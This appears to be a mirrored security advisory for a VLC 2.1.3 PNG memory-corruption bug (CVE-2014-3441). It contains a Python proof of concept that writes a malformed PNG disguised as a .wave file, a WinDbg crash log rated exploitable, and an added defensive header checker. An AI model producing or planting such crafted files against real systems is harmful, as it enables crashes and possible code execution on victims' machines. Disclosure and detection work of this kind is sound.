
VLC Player 2.1.3 Memory Corruption

09 May 2014 | Reported by Aryan Bayaninejad | Type: packetstorm | Source: packetstormsecurity.com

VLC Player 2.1.3 Memory Corruption via Malformed .png File Format

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2014-3441 | 9 May 2014 00:00 | circl |
| CVE | CVE-2014-3441 | 14 May 2014 19:00 | cve |
| Cvelist | CVE-2014-3441 | 14 May 2014 19:00 | cvelist |
| Debian CVE | CVE-2014-3441 | 14 May 2014 19:00 | debiancve |
| EUVD | EUVD-2014-3453 | 7 Oct 2025 00:30 | euvd |
| Kaspersky | KLA10008 Denial of Service in VideoLAN VLC Media Player | 14 May 2014 00:00 | kaspersky |
| NVD | CVE-2014-3441 | 14 May 2014 19:55 | nvd |
| OpenVAS | VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Windows | 4 Jun 2014 00:00 | openvas |
| OpenVAS | VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Mac OS X | 4 Jun 2014 00:00 | openvas |
| OpenVAS | VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Linux | 4 Jun 2014 00:00 | openvas |

`# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]  
# Date: [2014/05/07]  
# Exploit Author: [Aryan Bayaninejad]  
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]  
# Vendor Homepage: [www.videolan.org]  
# Software Link: [http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/]  
# Version: [Version 2.1.3 and prior to that]  
# Tested on: [Windows Xp Sp 3 x86]  
# CVE : [2014-3441]  
  
details:  
  
VLC player, latest version 2.1.3, suffers from a memory corruption  
vulnerability triggered by a malformed .png file when  
codec\libpng_plugin.dll is loaded. The file extension can be changed to .wave.  
  
  
Poc:  
  
#!/usr/bin/python  
# Python 2 script: writes the malformed PNG bytes below to poc.wave  
data = \
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"  
outfile = file("poc.wave", 'wb')  
outfile.write(data)  
outfile.close()  
print "Created Poc"  
  
  
  
  
  
windbg result:  
  
  
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86  
Copyright (c) Microsoft Corporation. All rights reserved.  
  
CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"  
Symbol search path is: *** Invalid ***  
****************************************************************************  
* Symbol loading may be unreliable without a symbol search path. *  
* Use .symfix to have the debugger choose a symbol path. *  
* After setting your symbol path, use .reload to refresh symbol locations. *  
****************************************************************************  
Executable search path is:  
ModLoad: 00400000 00426000 image00400000  
ModLoad: 7c900000 7c9af000 ntdll.dll  
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll  
ModLoad: 6a300000 6a324000 C:\Program Files\VideoLAN\VLC\libvlc.dll  
ModLoad: 6a540000 6a791000 C:\Program Files\VideoLAN\VLC\libvlccore.dll  
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll  
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll  
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll  
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll  
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL  
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll  
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll  
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll  
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL  
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll  
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll  
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL  
ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.DLL  
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll  
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll  
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll  
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll  
(250.c1c): Break instruction exception - code 80000003 (first chance)  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -  
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4  
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202  
ntdll!DbgBreakPoint:  
7c90120e cc int 3  
0:000> g  
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL  
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL  
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll  
ModLoad: 773d0000 774d3000  
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll  
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll  
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll  
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll  
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime  
ModLoad: 10000000 10008000 C:\Program Files\Internet Download  
Manager\idmmkb.dll  
ModLoad: 64fc0000 65008000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll  
ModLoad: 6aac0000 6aacf000 C:\Program  
Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll  
ModLoad: 6e980000 6e990000 C:\Program  
Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll  
ModLoad: 6a100000 6a119000 C:\Program  
Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll  
ModLoad: 6c400000 6c5f6000 C:\Program  
Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll  
ModLoad: 68740000 68760000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll  
ModLoad: 6f440000 6f483000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll  
ModLoad: 6b840000 6b85b000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll  
ModLoad: 6f100000 6f114000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll  
ModLoad: 68bc0000 68bd7000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll  
ModLoad: 64a00000 64a8b000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll  
ModLoad: 70680000 70736000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll  
ModLoad: 6ae40000 6ae64000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll  
ModLoad: 69e40000 69e52000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll  
ModLoad: 6d700000 6d70c000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll  
ModLoad: 70240000 70267000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll  
ModLoad: 6cd00000 6ce7a000 C:\Program  
Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll  
ModLoad: 66040000 66090000 C:\Program  
Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll  
ModLoad: 625c0000 626f9000 C:\Program  
Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll  
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\DSOUND.DLL  
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll  
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv  
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll  
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 6ff40000 6ff55000 C:\Program  
Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll  
ModLoad: 6e180000 6e191000 C:\Program  
Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll  
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc  
without interface.  
ModLoad: 68e80000 6992e000 C:\Program  
Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll  
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.DLL  
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV  
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.DLL  
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\userenv.dll  
ModLoad: 01a20000 01ce5000 C:\WINDOWS\system32\xpsp2res.dll  
ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll  
ModLoad: 76360000 76370000 C:\WINDOWS\system32\winsta.dll  
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll  
ModLoad: 6d6c0000 6d6f7000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll  
ModLoad: 6e040000 6e05e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll  
ModLoad: 68440000 68458000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll  
ModLoad: 6c380000 6c39b000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll  
ModLoad: 6ef40000 6ef4e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll  
es demux error: cannot peek  
es demux error: cannot peek  
ModLoad: 011e0000 011fa000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll  
ModLoad: 6c2c0000 6c2cd000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll  
ModLoad: 62380000 6238e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll  
ModLoad: 67e00000 67e0d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll  
ModLoad: 03610000 036fc000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll  
ModLoad: 6bf40000 6bf65000 C:\Program  
Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll  
ModLoad: 6f8c0000 6f8eb000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll  
ModLoad: 6a840000 6a96f000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll  
ModLoad: 70b00000 70b0c000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll  
ModLoad: 6d8c0000 6d97b000 C:\Program  
Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll  
ModLoad: 64740000 6474d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll  
ModLoad: 6cbc0000 6cbcd000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll  
ModLoad: 65300000 6530c000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll  
ModLoad: 67500000 6750d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll  
ModLoad: 6ce80000 6ce8d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll  
ModLoad: 6fec0000 6fecc000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll  
ModLoad: 6b500000 6b56d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll  
ModLoad: 65280000 6528d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll  
ModLoad: 6c940000 6c94e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll  
ModLoad: 683c0000 6840f000 C:\Program  
Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll  
(250.b14): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -  
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000  
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
msvcrt!memset+0x41:  
77c47631 f3ab rep stos dword ptr es:[edi]  
0:009> .load winext/msec.dll  
0:009> !exploitable  
  
!exploitable 1.6.0.0  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\VideoLAN\VLC\libvlccore.dll -  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -  
Exploitability Classification: EXPLOITABLE  
Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)  
  
User mode write access violations that are not near NULL are exploitable.  
`
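
Added example, not part of the advisory or of VLC's code: the IHDR chunk in the PoC bytes above declares a width of 0x7FFFFFFF and a height of 0x102, so a pre-decode check on the declared geometry is enough to flag this file before it reaches a decoder. The limits `MAX_DIM` and `MAX_RAW_BYTES` and the function names are assumptions chosen for illustration, and the sample headers are constructed.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_DIM = 16384               # assumed policy limit per side
MAX_RAW_BYTES = 256 * 2**20   # assumed cap on decoded image size
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # colour type -> samples per pixel


def check_png_header(blob):
    """Return findings for the signature and IHDR chunk; empty list means OK."""
    if blob[:8] != PNG_SIG:
        return ["not a PNG signature"]
    if len(blob) < 33:
        return ["truncated before end of IHDR"]
    length, ctype = struct.unpack(">I4s", blob[8:16])
    if ctype != b"IHDR" or length != 13:
        return ["first chunk is not a 13-byte IHDR"]
    body = blob[16:29]
    width, height, depth, colour = struct.unpack(">IIBB", body[:10])
    findings = []
    if struct.unpack(">I", blob[29:33])[0] != zlib.crc32(b"IHDR" + body):
        findings.append("IHDR CRC mismatch")
    if colour not in CHANNELS or depth not in (1, 2, 4, 8, 16):
        return findings + ["invalid colour type or bit depth"]
    if width == 0 or height == 0:
        findings.append("zero dimension")
    if width > MAX_DIM or height > MAX_DIM:
        findings.append("dimension over limit: %dx%d" % (width, height))
    # Python ints are unbounded, so this product cannot wrap the way a
    # 32-bit size calculation in a native decoder can.
    rowbytes = (width * CHANNELS[colour] * depth + 7) // 8
    if rowbytes * height > MAX_RAW_BYTES:
        findings.append("decoded size over limit: %d bytes" % (rowbytes * height))
    return findings


def make_header(width, height, depth=8, colour=6):
    """Constructed sample: PNG signature plus IHDR only, no image data."""
    body = struct.pack(">IIBBBBB", width, height, depth, colour, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + body)
    return PNG_SIG + struct.pack(">I4s", 13, b"IHDR") + body + struct.pack(">I", crc)


if __name__ == "__main__":
    # Same declared geometry as the IHDR bytes in the PoC on this page.
    print(check_png_header(make_header(0x7FFFFFFF, 0x102, 1, 3)))
    print(check_png_header(make_header(640, 480)))
```

The check keys on file content rather than the file name, which matters here because the advisory notes the extension can be changed to .wave.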
